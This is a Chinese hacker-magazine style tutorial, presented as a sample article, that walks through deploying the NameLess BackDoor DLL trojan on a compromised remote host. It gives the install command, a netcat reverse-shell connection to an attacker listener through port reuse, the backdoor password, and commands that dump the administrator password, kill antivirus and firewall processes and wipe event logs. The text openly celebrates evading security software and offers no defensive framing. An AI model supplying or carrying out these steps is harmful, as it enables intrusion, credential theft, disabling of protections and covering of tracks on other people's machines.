范文：《气死杀毒软件 逼疯防火墙——新兴木马NameLess BackDoor复仇记》

NameLess BackDoor是一款新兴的DLL型木马，这个木马出世没多久，但绝对是一匹极有潜质的千里驹。

说起NameLess BackDoor的前身来，不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时，可以说是木马界的元老了。而NameLess BackDoor则是汇集了上面这两款木马的优点，在目标机器的进程管理器中看不到，平时没有端口，提供正向连接和反向连接两种功能。同时NameLess BackDoor又去除了各处的缺点，比如反弹的cmd.exe进程，在目标机器的进程管理中也可以隐藏无需利用BITS服务等（马儿：不开端口，无进程，看看防火墙和杀毒软件还能拿我怎么办！气死你，哈哈）。

NameLess BackDoor实战演练

将NameLess BackDoor安装上远程主机到连接木马控制主机，就像一场进行在杀毒软件和防火墙眼皮底下，却又无声无悄的暗战。

一、随风潜入夜——安装

下载NameLess BackDoor木马，压缩包中有两个名为NameLess.dll的DLL文件，一个Pack压缩加过壳的，一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件（笔者用的是最新病毒库的KV2005），但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵，这下子可以放心的在任何环境下进行安装了。

怎么将木马安装到远程的电脑上呢？当然最简单的就是扫描要攻击电脑上的系统漏洞，然后进行攻击入侵控制。方法很多了，反正你拿到远程主机的控制权后，将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后，写入一个FTP下载的BAT文件，直接在本地建立了一个FTP服务器，通过FTP服务器下载上传文件的（这些内容以前杂志介绍过，这里就不作过多的讲解啦）。下面重点来看看我是怎样安装木马文件的吧！

在远程Ttelnet命令窗口中切换到文件上传目录中，并输入如下命令******（如图1）：

Rundll32 NameLess.dll,Install

执行该命令后后门就被安装成功了，后门会自动替换系统服务Sens的ServiceDll文件，在电脑重启后以Svchost.exe启动。

小提示：由于NameLess BackDoor是一个DLL型木马，因此在安装和启动的过程中，远程主机上的杀毒软件不会有任何提示和反应。

二、穿墙细无声——连接

安装和启动的过程中顺利地搞定了杀毒软件，下面看看NameLess BackDoor怎么让防火墙无能为力的。

小提示：NameLess BackDoor有两种连接方式：正向连接和反向连接，其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess BackDoor在连接后门时使用了端口复用技术，通过重用系统进程开放的任意一个端口，因此可以轻松的穿透各种防火墙。

我们首先需要扫描远程主机上开放了哪些端口，假设某台远程主机（IP地址为：192.168.1.11）上开放了139端口，那么可以本地打开一个命令窗口，切换到瑞士军刀NC所在的目录中，运行如下命令：

nc -l -p 12345

命令执行后将在本地监听12345端口，然后再打开一个命令窗口，输入如下命令******（如图2）：

nc 192.168.1.11 139

建立连接后输入如下内容******（如图3）：

dargun|192.168.1.11:12345

其中的IP地址可根据具体情况进行更改。命令执行后，在刚才的监听窗口中就可以看到出现了连接提示：“Enter Password:”，输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了！（如果我是防火墙，一定气疯了，哈）

三、为我所欲为——控制

成功“气死”杀毒软件和“逼疯”防火墙后，现在就可以控制远程主机了。NameLess BackDoor的强大也体现在它的控制功能上，连接登陆远程主机后，输入help命令，即可看到详细的命令帮助信息******（如图4）。如果你使用过winshell或wineggdropshell的话，应该对这种模式的后门就不会陌生，不过就算从来没有使用过这样的后门，也会感觉很简单的。

1.巧盗管理员密码

连接上远程主机后该干什么呢？我得好好想一想……呵呵，看看管理员的密码是多少吧！

在命令窗口中直接输入“findpass”命令，很快就可以看到管理员的密码了******（如图5），真是够简单的！

2.报仇雪恨

我一直对杀毒软件和防火墙耿耿于怀，即然它们总是杀死我的马儿，那么今天也让它们“血债血还”，尝尝被木马杀死的滋味吧！

先输入“Pslist”命令，执行后显示了远程主机上所有正在运行的进程******（如图6），哈哈，里面有杀毒软件和防火墙的进程，将它们Kill掉吧！命令很简单，敲入“Pskill 进程名”就搞定！

小提示：NameLess BackDoor还有很多功能了，包括在后台上传下载文件，安装终端服务，重启或关闭远程主机电源等，非常简单的一个命令就可以完成，这些都留给大家作为课后练习吧。

不过最后千万别忘记了一点，那就是清除自己的入侵痕迹，命令很简单，直接输入“CleanEvent”回车即可。OK，入侵结束，闪人！（大家有空别忘去医院探望杀毒软件和防火墙两兄弟啊）